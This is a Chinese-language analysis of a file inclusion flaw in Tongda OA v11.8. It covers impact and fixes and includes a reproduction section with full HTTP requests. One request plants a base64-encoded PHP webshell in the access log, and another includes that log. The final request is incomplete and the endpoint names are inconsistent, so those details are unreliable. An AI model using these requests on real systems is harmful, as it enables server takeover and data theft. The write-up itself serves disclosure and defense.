通达OA v11.8 远程文件包含漏洞分析及复现

"通达OA v11.8版本中的getway.php存在远程文件包含漏洞，该漏洞可能导致任意文件写入，影响系统安全。" ### 通达OA v11.8 getway.php 远程文件包含漏洞详解 通达OA（Tongda Office Automation）是一款广泛应用的企业级协同办公系统，旨在提升企业的信息化管理水平。然而，在其v11.8版本中，getway.php组件存在一个远程文件包含漏洞，这给系统带来了潜在的安全风险。 #### 漏洞描述 该漏洞源于getway.php文件在处理用户输入时没有进行充分的过滤和验证，允许攻击者通过构造特定的HTTP请求，将外部文件内容包含到系统中。当攻击者能够控制输入参数，尤其是URL参数时，可以尝试包含系统日志或其他敏感文件，甚至可以利用此漏洞执行任意代码。 #### 漏洞影响 受影响的版本是通达OA v11.8。由于getway.php组件的文件包含功能设计缺陷，攻击者可以利用此漏洞实现以下可能的危害： 1. **任意文件读取**：攻击者可以通过指定日志文件路径，读取服务器上的任意文件，包括但不限于系统配置、敏感数据等。 2. **代码执行**：通过包含可执行PHP代码的日志文件，攻击者可能能够执行服务器上的PHP代码，从而获得系统权限。 3. **数据泄露**：读取敏感日志或系统文件可能导致企业机密、用户信息等重要数据泄露。 4. **服务中断**：恶意操作可能导致OA系统的正常运行受到影响，影响企业日常办公。 #### 漏洞复现步骤 1. **登录页面**：首先，攻击者需要知道OA系统的登录页面地址。 2. **发送恶意请求**：构造一个包含恶意PHP代码的HTTP GET请求，例如： ``` GET /d1a4278d?json={}&aa=<?php@fputs(fopen(base64_decode('Y21kc2hlbGwucGhw'),w),base64_decode('PD9waHAgQGV2YWwoJF9QT1NUWydjbWRzaGVsbCddKTs/Pg=='));?>HTTP/1.1 Host: User-Agent: Go-http-client/1.1 Accept-Encoding: gzip ``` 这个请求会尝试写入一个包含PHP代码的文件。 3. **包含日志文件**：然后，发送一个POST请求，通过getway.php包含含有恶意代码的日志文件，例如： ``` POST /ispirit/interface/gateway.php HTTP/1.1 Host: User-Agent: Go-http-client/1.1 Content-Length: 54 Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip json={"url":"/general/../../nginx/logs/oa.access.log"} ``` 这个请求包含了日志文件的路径，使得系统尝试加载并执行其中的恶意代码。 4. **再次执行恶意代码**：最后，攻击者可能需要再次发送请求以触发代码执行，例如： ``` POST /mac/gateway.php HTTP/1.1 Host: User-Agent: Go-http-client/1.1 Content-Length: 5 ``` 此请求可能用于触发之前写入的PHP代码执行。 #### 防护与修复建议 1. **更新补丁**：尽快将通达OA系统升级到最新且安全的版本，避免使用已知存在漏洞的旧版本。 2. **加强输入验证**：对所有用户输入进行严格的过滤和验证，尤其是涉及文件路径和URL的参数。 3. **限制文件包含**：禁止或限制getway.php等关键组件的远程文件包含功能，仅允许包含特定的、受信任的文件。 4. **日志安全**：确保日志文件存储位置的安全性，限制非授权访问，并监控异常读取行为。 5. **安全配置**：根据最佳实践调整服务器配置，如禁用不必要的PHP函数，如`fopen()`、`eval()`等，以降低攻击面。 6. **定期审计**：定期进行系统安全审计，发现并修复潜在的安全隐患。 7. **防火墙与入侵检测**：设置防火墙规则，阻止恶意请求，同时部署入侵检测系统来预警和防止此类攻击。 通过以上措施，企业可以有效防护此类远程文件包含漏洞，确保通达OA系统的安全稳定运行。